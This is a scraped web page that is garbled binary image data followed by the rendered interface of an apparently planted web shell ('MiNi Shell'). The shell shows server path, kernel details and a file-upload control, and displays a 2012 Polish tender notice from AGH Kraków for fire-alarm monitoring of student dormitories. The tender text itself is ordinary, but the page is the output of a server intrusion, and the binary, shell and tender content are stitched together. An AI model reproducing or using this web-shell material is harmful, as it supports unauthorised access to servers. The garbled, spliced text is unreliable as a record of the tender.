JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/459878-N-2012.html

<p class="kh_header"><b>Kraków: Monitorowanie instalacji przeciwpożarowej w obiektach Miasteczka  Studenckiego AGH  w Krakowie- ZP/0784/2012</b><br>
<b>Numer ogłoszenia: 459878 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Górniczo - Hutnicza im. Stanisława Staszica , Al. Mickiewicza 30, 30-059 Kraków, woj. małopolskie, tel. 012 6173595, faks (012) 6173595, 6173363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ms.agh.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitorowanie instalacji przeciwpożarowej w obiektach Miasteczka  Studenckiego AGH  w Krakowie- ZP/0784/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest monitorowanie instalacji przeciwpożarowej w obiektach Miasteczka Studenckiego AGH w Krakowie w systemie dwustopniowym.

I.	Zakres zamówienia:
1.	monitorowanie instalacji przeciwpożarowych w obiektach Miasteczka Studenckiego AGH w Krakowie polegające na przesyłaniu sygnałów alarmowych z domów studenckich (wg wykazu poniżej) za pośrednictwem Centrum Monitorowania Wykonawcy (operatora systemu) do Centrum Odbiorczego Alarmów Pożarowych  Państwowej Straży Pożarnej  (COAP PSP) z wykorzystaniem własnych urządzeń transmisji alarmów pożarowych i sygnałów uszkodzeniowych (UTAiSU)  zainstalowanych w obiektach Zamawiającego.  z wykorzystaniem łączy radiowych i telefonii stacjonarnej 
2.	monitorowanie należy realizować przy użyciu własnych urządzeń spełniających określone niżej wymagania przesyłając sygnały alarmowe wygenerowane przez istniejące w obiektach systemy przeciwpożarowe do Centrum Monitorowania Wykonawcy (CMW), Centrum Monitorowania MS AGH  (CM MS AGH) oraz Centrum Odbiorczego Alarmów Pożarowych  Państwowej Straży Pożarnej (COAP PSP),
3.	całodobowy nadzór techniczny nad urządzeniami systemu monitorowania oraz ich bieżąca konserwacja,
4.	odbiór sygnałów alarmowych z obiektów objętych monitorowaniem i przekazywanie ich automatycznie do Centrum Odbiorczego Alarmów Pożarowych (COAP) obsługiwanego przez PSP  w Krakowie,
5.	zgłoszenie połączeń systemów przeciwpożarowych obiektów do COAP PSP wraz z uzyskiwaniem co miesięcznych potwierdzeń PSP dotyczących sprawności ich działania, 
II.	Wymagania dla systemu transmisji alarmu:
1.	Urządzenia do transmisji alarmów pożarowych i sygnałów uszkodzeniowych (UTAiSU)   zainstalowane przez Wykonawcę  muszą posiadać certyfikaty zgodności z  normą zharmonizowaną EN 54-21:2006 (PN-EN 54-21:2009).
2.	system musi zapewnić możliwość zmiany ilości użytkowników bez wpływu na jakość transmisji, w momencie wystąpienia problemów w transmisji, układ powinien zapewnić generowanie sygnału błędu,
3.	urządzenia do transmisji alarmów muszą spełniać Polskie Normy dotyczące sprawdzania interfejsów  systemu transmisji, kompatybilności elektromagnetycznej, badań środowiskowych,
4.	system  musi spełniać wymagania określone przez Komendanta Głównego PSP określone w opracowaniu pt.: Ramowe wymagania organizacyjno-techniczne dotyczące uzgadniania przez Komendanta Powiatowego (Miejskiego)  Państwowej Straży Pożarnej   sposobu połączeń urządzeń sygnalizacyjno-alarmowych sytemu sygnalizacji pożarowej z obiektem Komendy  Państwowej Straży Pożarnej   lub wskazanym przez właściwego miejscowo Komendanta Powiatowego (Miejskiego)  Państwowej Straży Pożarnej - Warszawa maj 2012 r.
III.	Obowiązki Wykonawcy:
1.	terminowe przekazanie systemu  transmisji alarmu do eksploatacji i zapewnienie jego odbioru przez właściwe służby PSP,
2.	zabezpieczenie dokumentacji monitorowania chronionych obiektów Zamawiającego,
3.	całodobowe monitorowanie systemu przesyłania sygnałów alarmowych z chronionych obiektów,
4.	utrzymanie w stałej sprawności technicznej wszystkich urządzeń systemu alarmowego objętego umową ,
5.	przystąpienie do usuwania awarii najpóźniej do 1 godziny od momentu zgłoszenia,
6.	przyjmowanie zgłoszeń o awariach przez 24 godziny na dobę przez cały rok,
7.	informowanie Działu Obsługi Technicznej MS na bieżąco o problemach i wszelkich awariach związanych z działalnością systemu oraz pomoc przy ich rozwiązywaniu,
8.	ponoszenie kosztów wszystkich części zamiennych i materiałów koniecznych do bieżącej konserwacji systemu, 
9.	opracowanie i dostarczenie niezbędnej instrukcji postępowania dla pracowników Zamawiającego. 
10.	przeprowadzenie szkolenia pracowników Zamawiającego zatrudnionych w obiektach wymienionych poniżej w obsłudze zainstalowanego przez Wykonawcę sprzętu. 
IV.	Wykaz domów studenckich objętych zamówieniem:
1)	Dom Studencki nr 1 (DS-1) Olimp		        - Kraków ul. Rostafińskiego 9
2)	Dom Studencki nr 2 (DS-2) Babilon		        - Kraków ul. Rostafińskiego 11
3)	Dom Studencki nr 3 (DS-3) Akropol		        - Kraków ul. Tokarskiego 1
4)	Dom Studencki nr 4 (DS-4) Filutek 		        - Kraków ul. Rostafińskiego 10
5)	Dom Studencki nr 5 (DS-5) Strumyk 		- Kraków ul. Rostafińskiego 8
6)	Dom Studencki nr 6 (DS-6) Bratek 		        - Kraków ul. Rostafińskiego 6
7)	Dom Studencki nr 7 (DS-7) Zaścianek		- Kraków ul. Rostafińskiego 4
8)	Dom Studencki nr 8 (DS-8) Stokrotka		- Kraków ul. Rostafińskiego 2
9)	Dom Studencki nr 9 (DS-9) 			        - Kraków ul. Budryka 9
10)	Dom Studencki nr 10 (DS-10) Hajduczek      	- Kraków ul. Budryka 7
11)	Dom Studencki nr 11 (DS-11) Bonus		        - Kraków ul. Budryka 5 
12)	Dom Studencki nr 12 (DS-12) Promyk		- Kraków ul. Budryka 3
13)	Dom Studencki nr 13 (DS-13) Straszny Dwór 	- Kraków ul. Budryka 1
14)	Dom Studencki nr 14 (DS-14) Kapitol		- Kraków ul. Budryka 2
15)	Dom Studencki nr 15 (DS-15) Maraton 		- Kraków ul. Tokarskiego 10
16)	Dom Studencki nr 16 (DS-16) Itaka     	        - Kraków ul. Tokarskiego 8
17)	Dom Studencki nr 17 (DS-17) Arkadia 		- Kraków ul. Tokarskiego 6
18)	Dom Studencki nr 18 (DS-18) 			- Kraków ul. Tokarskiego 4
19)	Dom Studencki nr 19 (DS-19) 			- Kraków ul. Tokarskiego 2
Każdy  z ww.  domów studenckich posiada własną Centralę Sygnalizacji Alarmu Pożaru wyposażoną w   moduł monitoringu. W ww. budynkach mieszka w okresie roku akademickiego około 9.000 studentów.
Domy studenckie nr 1, 2, 3, 14 są budynkami 16 piętrowymi, a  pozostałe są  czteropiętrowe. 

V.	Uwagi ogólne:
a)	Wykonawca usługę będzie  realizował całodobowo we wszystkie dni tygodnia,
b)	Wykonawca zobowiązany jest do wykonywania usług objętych przedmiotem umowy z należytą starannością i zgodnie z aktualnym poziomem wiedzy technicznej i przepisami prawa w tym: ustawy z dnia 24 sierpnia 1991 r. o ochronie przeciwpożarowej (Dz. U. z 2009 r. Nr 178, poz. 1380 oraz z 2010 r. Nr 57, poz. 353) i rozporządzenie ministra spraw wewnętrznych i administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. z 2010 r. nr 109 poz. 719).
c)	cena oferty wyliczona przez Wykonawcę musi uwzględniać wszystkie  koszty związane z uruchomieniem i funkcjonowaniem systemu transmisji alarmu oraz z jego utrzymaniem w pełnej sprawności technicznej w okresie trwania umowy,
d)	wycenę usługi uwzględniającą ww. opis przedmiotu zamówienia Wykonawca dokona wypełniając załącznik nr 4 do SIWZ,
e)	Wykonawca winien zapewnić możliwość całodobowego zgłaszania przez Zamawiającego (telefon, fax itp.) wszelkich usterek i awarii systemu oraz przystąpić do ich usuwania do 1 godziny od otrzymania zgłoszenia,
f)	Wykonawca zobowiązany będzie do utrzymania systemu alarmowego ppoż Miasteczka Studenckiego AGH w stałej sprawności technicznej, z wyjątkiem przerw niezbędnych do wykonywania czynności konserwacyjno- naprawczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.10-4, 31.62.52.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać:
Zgodę Komendy Miejskiej Państwowej Straży Pożarnej  w Krakowie na prowadzenie monitoringu pożarowego na jej terenie  - ustawa z dnia 24.08.1991 o ochronie przeciwpożarowej (Dz. U. nr 81, poz.351 z póżn. zmianami.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty kopi dokumentu potwierdzającego uzyskanie zgody na prowadzenie działalności będącej przedmiotem niniejszego postępowania na terenie podległym KM PSP w Krakowie, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizował usług o charakterze i złożoności porównywalnym z zakresem przedmiotu zamówienia tzn.:
1)	zrealizował zamówienia dotyczące przesyłaniu sygnałów alarmowych ppoż. na łączną kwotę minimum 30.000,- zł
2)	zrealizował minimum dwa zamówienia  związane z przesyłaniem sygnału z minimum 10 obiektów każde za pośrednictwem Centrum Monitorowania do Centrum Odbiorczego Alarmów Pożarowych  Państwowej Straży Pożarnej  (COAP PSP)  
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu usług (zał. Nr 7 do SIWZ)   + dokumenty potwierdzające należyte wykonanie metodą spełnia/nie spełnia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż dysponuje lub będzie dysponować następującymi narzędziami niezbędnymi do wykonania zamówienia:
1.	Centrum Monitorowania połączonym z Centrum Odbiorczym Alarmów Pożarowych  Państwowej Straży Pożarnej 
2.	Minimum 19 kompletami urządzeń do transmisji alarmów pożarowych i sygnałów uszkodzeniowych (UTAiSU)  posiadających certyfikaty zgodności z  normą zharmonizowaną EN 54-21:2006 (PN-EN 54-21:2009) koniecznymi do zainstalowane przez Wykonawcę  w obiektach Zamawiającego
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia złożonego na formularzu oferty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać polisę lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej do kwoty minimum 500.000 zł. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia złożonego na formularzu oferty, metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz oferty
2.Formularz Specyfikacji Cenowej
3.Wykaz części zamówienia,  które zostaną  wykonane przez podwykonawców (jeżeli Wykonawca przewiduje taki udział)                
4. Opis zaproponowanych urządzeń do transmisji alarmów pożarowych i sygnałów uszkodzeniowych (UTAiSU)  wraz z instrukcją postępowania dla pracowników  Zamawiającego
5.Harmonogram uruchomienia systemu transmisji alarmu
6.Zasady zapewnienia ciągłości  transmisji  sygnału alarmu do COAP PSP w okresie przejmowania istniejącego sytemu alarmowego jak i przekazywania następnemu wykonawcy po wygaśnięciu umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy 
w następującym zakresie: 
1)	wysokości wynagrodzenia w przypadku:
      a)	zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy,
      b)	ograniczenia zakresu prac objętych niniejszą umową w przypadku stwierdzenia braku konieczności wykonywania części zamówienia, 
2)	osób przewidzianych do realizacji zamówienia przez Wykonawcę w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w umowie.
Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ms.agh.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat MS AGH  przy ul. Rostafińskiego 7a  30-072 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 09:00, miejsce: Sekretariat MS AGH  przy ul. Rostafińskiego 7a  30-072 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com